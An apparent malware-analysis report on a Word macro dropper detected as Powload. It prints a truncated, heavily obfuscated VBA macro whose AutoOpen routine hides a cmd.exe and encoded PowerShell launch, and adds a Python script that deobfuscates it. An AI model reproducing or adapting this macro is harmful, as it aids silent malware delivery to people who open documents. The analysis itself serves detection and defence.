Verdict: MALICIOUS (risk score 202)

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
The sample carries a VBA macro project (recovered by olevba as macros.bas, below) whose Sub AutoOpen() calls Shell() with a window style of 0 (vbHide), so the child process runs without a visible window. The command string is never present as a literal: it is assembled at run time by concatenating dozens of short string fragments, a Chr() call and a Word KeyString() call, with cmd.exe caret (^) escapes inserted between characters and junk `Hour` arithmetic wrapped in On Error Resume Next between the statements. With the carets removed, the visible part of the command starts cmd /V:O/C"set UZz=..., that is, cmd.exe with delayed variable expansion building an environment variable from an encoded blob. The remainder of the command line, including any URL, lies in the truncated part of the preview, so the second-stage download is inferred from this pattern and from the ClamAV detection Doc.Dropper.Powload-6922842-0 (a Powload dropper signature) rather than observed directly.
Heuristics (6)

- ClamAV: Doc.Dropper.Powload-6922842-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Powload-6922842-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code.
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA. In this sample the first argument is assembled at run time from string fragments and the second argument (38 - 38) evaluates to 0, vbHide, so the spawned process has no visible window.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro. The Sub AutoOpen() in the recovered module runs as soon as the document is opened with macros enabled; no user interaction beyond opening the file is needed.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this rule text does not fit the sample: olevba did recover a VBA project (macros.bas below, with Attribute VB_Name lines and a Sub AutoOpen()), so the marker is simply the AutoOpen name of that VBA macro, and this finding adds no signal beyond OLE_VBA_AUTOOPEN.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/drawingml/2006/main, in document text (OLE body). This is the DrawingML XML namespace URI that appears in any Office document containing a drawing part; it is a schema identifier, not a network indicator, and should not be hunted for or blocked.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7409 bytes | 7e28454aa2bf18a1a5edf217d64e182e8a5492d7956ca4c795ce6d0d31fb0e76 |
Preview: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "jOzcCcYkP"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Hour 84627 * bEzNX * 49206 / VVCRp
Hour 22186 / tzjYYV
Shell KeyString(6 + 2 + 2 + 6 + 51) + PdLasCiA + JcFZCzj + ivvtrurcH + fBzVk + vpjKKZo + zzBWzQVnNi + CsCFfUBshZTq + qwuOicTYQhb, 38 - 38
Hour 18810 * ZharpZ / QMXfF / KzbnNr
Hour 56824 / OSAwb
Hour 28839 * HjBEQi / 53965 / 40297
End Sub
Attribute VB_Name = "IalXiYlJaptOJ"
Function ivvtrurcH()
On _
Error _
Resume _
Next
Hour 93021 * FJfjJ * 68958 / PrIELn
Hour 86321 / JzWrpi * 55054 * ibidW
mzRMK = "md /V^:" + "^O/C" + Chr(4 + 1 + 3 + 4 + 22) + "^s^e" + "t ^UZ^" + "z===A^" + "A^g^" + "A" + "A"
Hour 40182 / NcwLk / 48998 * HAhiQ
Hour 74861 / bRWqDc * 61576 * WQbWij
Hour 32757 / rAuDZj * 4175 * zqmTAt
irDnUnjC = "I^AA" + "C^Ag" + "AA^IAAC" + "^A" + "^gA" + "^AI^A" + "ACA^"
Hour 41474 * 95905
Hour qnAKo * rrCjD * BZCznf / lrvULw
FNfSQOo = "gA^AI" + "^A" + "^AC^Ag" + "A^AIA^A" + "C^"
Hour arSvS / Oqvtlh / 40766 * rhzVj
Hour rEUah * dCjDL * 44821 * wkwQjT
sAMIbrGM = "Ag^" + "AAI^A^0" + "H" + "^A" + "^9B^w" + "^e^" + "A" + "g^G^A" + "j" + "B^"
Hour 77843 * apbnt
Hour ifYXML * EOmHA * 32506 * CiObP
hLwDrF = "AdA^E^G" + "A^jB^Q" + "^f^As^" + "D^ArB" + "^"
Hour diVHHu * JYFiv / RjozC * PoEPH
Hour 27311 / DkcJmX * cDqqfw / 49870
Hour MVwdcP * 13253 * 86533 / mvGcI
ZBWEzm = "QYAUGA" + "^y^Bg^" + "Y^" + "A" + "s^D^" + "As^" + "B" + "AU^A^AH"
ivvtrurcH = mzRMK + irDnUnjC + FNfSQOo + sAMIbrGM + hLwDrF + ZBWEzm
Hour 29041 / oJhvL
Hour joAElG * fvVFG
Hour vvVTiS / uaOwz
Hour 56866 * ofBzs
End Function
Function fBzVk()
On _
Error _
Resume _
Next
Hour kGjuV * HhPzz * 46709 / tLZJaH
Hour 2759 / qXiSTa * HoDVL / kJJmV
Hour wHWqEm * LUrBj / 82460 * wETpsr
Hour 47085 / 26713
rftwaqAvHY = "Ak^" + "AA^" + "I" + "A0" + "G^AlB" + "^AdA" + "k^" + "EA" + "t^A^Q" + "ZA" + "s^GAv" + "^Bg^" + "d^A^"
Hour bAzOs / 32523
Hour 46629 / YkzMOE
Hour 55737 * lDvrbi
YJRZozq = "4" + "GA" + "^" + "JBw" + "OA^k"
Hour 5165 * iVnZz * 67445 * RUmwzQ
okaLHU = "C^A" + "s" + "^BA" + "U^AAH" + "Ak" + "A^AI" + "AwC^A" + "^Y^B" + "^gZ^A" + "cH^AkA"
Hour 16678 / qiLCMP
GMAadK = "^" + "AKAU^G" + "^As" + "B^QaAYE" + "A^" + "k" + "^BQYA^" + "8^G^A^s" + "BgbA"
Hour 88922 * nzBdiL * 6766 / Bnbwf
azbkX = "cH" + "^Av^" + "B" + "AR^A^4" + "C^AYBgc" + "^A" + "^A^H" + "^A" + "k" + "^Awe" + "A^kHA^"
Hour 61518 * qwVGjE
Hour 16638 / oonoMS
ELtzzNjWEL = "y^B^A" + "^" + "d^A^s" + "^" + "HA^pAwc" + "Ag^G^AF" + "^B^A^"
Hour UTIPl / EdVOr
afZqcCXjoPD = "JA^ACA" + "u" + "^BQ^a" + "AAC^" + "A" + "YB^gZ^" + "Ac^" + "H^" + "A^k^A^A" + "K^A^gG" + "^A^jBQ" + "YA" + "^UG^"
Hour EYPfG / biIznU / juDWt * wfphY
KhENK = "Ay" + "B^" + "w^b^A" + "Y^" + "G^A^7A^" + "wJ" + "AU"
Hour UYwRcp * KcRHX
Hour 68816 / ziosjv
Hour JPMjzv / VpiXw * TMAjmp / TXCrd
Hour 33393 / wdMYOq * 82133 / jErhiJ
Hour 34014 / kIjBj
QFMGwRD = "^G^" + "A^4" + "B^QZA" + "4CA" + "n^A^w" + "^K^A^MG" + "^AVBQV^" + "AQ" + "CArA^w^" + "J"
Hour 40623 / Bdvkh
Hour 14981 / huDVq / kTtrNs * AsThUm
Hour scoRXj * ETtHo
Hour 41824 / JVEiw
EIARBuuNFE = "Aw" + "^FAn^A^" + "w^K" + "AM^" + "G" + "A^p^BA" + "bAIGA1^" + "B^Ac^" + "A^o"
fBzVk = rftwaqAvHY + YJRZozq + okaLHU + GMAadK + azbkX + ELtzzNjWEL + afZqcCXjoPD + KhENK + QFMGwRD + EIARBuuNFE
Hour soMCAh * rwvzWz
Hour KuBbs * aFAnz
Hour ZFWMfh / ozKQM * DEvAzO / iJMhhi
Hour 54195 / ZIoRAK * dXzMS * 44288
Hour BUWUKR / 45347
End Function
Function vpjKKZo()
On _
Error _
Resume _
Next
Hour 59180 * wamfn
Hour wJUUo / 13968 * zLZSDM / INzQt
Hour 65726 / LuhJUo / 90343 * tijYTD
Hour hjnUn * FGKVF * jSJMzI / MwRHX
ZKPUdWDGfOP = "^DA" + "2Bg^" + "bA^U^G" + "A^" + "k^AQ^" + "PA^" + "w^G^AQ" + "B^Ac^AQ" + "CA7^"
... (truncated)
```
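As an added worked example, not part of the report or of its analysis tooling, the script below recovers the argument the macro hands to Shell() from the statements shown in the preview. It embeds a constructed excerpt of macros.bas (the ivvtrurcH assignments and the Shell line, copied from the preview; fBzVk, vpjKKZo and the later helpers are truncated on the page and are left out, so they evaluate to empty and the result is only the head of the real command line). It implements just the VBA subset the macro uses (string literals, + concatenation, Chr() and KeyString() over sums of integer literals, bare identifiers, with undeclared names treated as Empty), strips cmd.exe caret escapes, and then reads the value assigned by `set` backwards as base64-encoded UTF-16LE text. The KeyString() mapping is an assumption: Word's Application.KeyString returns the name of a key code and 67 is the C key, and cmd.exe is case-insensitive, so the case of that letter does not matter. On the visible fragment the decoded tail reads ...;break;}catch{}} followed by spaces, the closing of a PowerShell try/catch loop, which fits the downloader assessment above; the front of that script, and any URL, cannot be recovered from this page.

```python
"""Recover the cmd.exe command line built by the AutoOpen macro in macros.bas.

Added example, not part of the report.  Only the VBA subset the excerpt uses is
implemented; the junk `Hour` statements and `On Error Resume Next` do not touch
the string and are omitted from the excerpt.
"""
import base64
import re

# Constructed excerpt: the string-building statements and the Shell line copied
# from the report's preview.  fBzVk and the later functions are truncated on the
# page, so they resolve to "" here and the recovered command is only a prefix.
MACRO_EXCERPT = r'''
mzRMK = "md /V^:" + "^O/C" + Chr(4 + 1 + 3 + 4 + 22) + "^s^e" + "t ^UZ^" + "z===A^" + "A^g^" + "A" + "A"
irDnUnjC = "I^AA" + "C^Ag" + "AA^IAAC" + "^A" + "^gA" + "^AI^A" + "ACA^"
FNfSQOo = "gA^AI" + "^A" + "^AC^Ag" + "A^AIA^A" + "C^"
sAMIbrGM = "Ag^" + "AAI^A^0" + "H" + "^A" + "^9B^w" + "^e^" + "A" + "g^G^A" + "j" + "B^"
hLwDrF = "AdA^E^G" + "A^jB^Q" + "^f^As^" + "D^ArB" + "^"
ZBWEzm = "QYAUGA" + "^y^Bg^" + "Y^" + "A" + "s^D^" + "As^" + "B" + "AU^A^AH"
ivvtrurcH = mzRMK + irDnUnjC + FNfSQOo + sAMIbrGM + hLwDrF + ZBWEzm
Shell KeyString(6 + 2 + 2 + 6 + 51) + PdLasCiA + JcFZCzj + ivvtrurcH + fBzVk + vpjKKZo + zzBWzQVnNi + CsCFfUBshZTq + qwuOicTYQhb, 38 - 38
'''

# One term of a '+'-joined expression: "literal", Chr(...), KeyString(...), or a name.
TERM = re.compile(r'"((?:[^"]|"")*)"|(Chr|KeyString)\(([^)]*)\)|([A-Za-z_]\w*)')
ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*(.+?)\s*$')
SHELL = re.compile(r'^\s*Shell\s+(.+),\s*([\d\s+-]+)$')


def vba_int(expr: str) -> int:
    """Evaluate a sum/difference of integer literals such as '38 - 38'."""
    total = 0
    for sign, num in re.findall(r'([+-]?)\s*(\d+)', expr):
        total += -int(num) if sign == '-' else int(num)
    return total


def vba_concat(expr: str, env: dict) -> str:
    """Evaluate a '+'-joined VBA string expression against env."""
    parts = []
    for lit, func, arg, name in TERM.findall(expr):
        if func == 'Chr':
            parts.append(chr(vba_int(arg)))
        elif func == 'KeyString':
            # Assumption: KeyString(code) yields the letter of that key (67 -> C key).
            parts.append(chr(vba_int(arg)).lower())
        elif name:
            parts.append(env.get(name, ''))      # undeclared name is Empty -> ""
        else:
            parts.append(lit.replace('""', '"'))
    return ''.join(parts)


def strip_cmd_carets(s: str) -> str:
    """Remove cmd.exe escape carets: ^x -> x and ^^ -> ^."""
    return re.sub(r'\^(.)', r'\1', s)


def decode_reversed_utf16_b64(value: str) -> str:
    """Read a `set` value backwards as base64 of UTF-16LE text.

    The head of the value is truncated on the page, so alignment is taken from
    the padded tail: drop leading base64 characters down to a multiple of four,
    and a leading byte if the decoded length is odd.
    """
    b64 = value[::-1]
    b64 = b64[len(b64) % 4:]
    raw = base64.b64decode(b64)
    raw = raw[len(raw) % 2:]
    return raw.decode('utf-16-le', errors='replace')


def analyze(src: str) -> dict:
    """Run the excerpt and report what Shell() would receive."""
    env, result = {}, {}
    for line in src.strip().splitlines():
        if m := SHELL.match(line):
            result['cmdline'] = strip_cmd_carets(vba_concat(m.group(1), env))
            result['window_style'] = vba_int(m.group(2))   # 0 == vbHide
        elif m := ASSIGN.match(line):
            env[m.group(1)] = vba_concat(m.group(2), env)
    # `set NAME=VALUE`: cmd splits on the first '=', so the value starts with "==".
    if m := re.search(r'set (\w+)=(\S*)', result['cmdline']):
        result['variable'] = m.group(1)
        result['decoded_tail'] = decode_reversed_utf16_b64(m.group(2))
    return result


if __name__ == '__main__':
    for key, val in analyze(MACRO_EXCERPT).items():
        print(f'{key}: {val!r}')
```

Because cmd.exe splits `set UZz===...` at the first `=`, the variable's value begins with `==`, which is the base64 padding of the reversed blob; that is what makes reading the value backwards work. To recover more of the command, paste the remaining functions from the full macros.bas into MACRO_EXCERPT in the order the Shell line concatenates them; they use the same VBA subset.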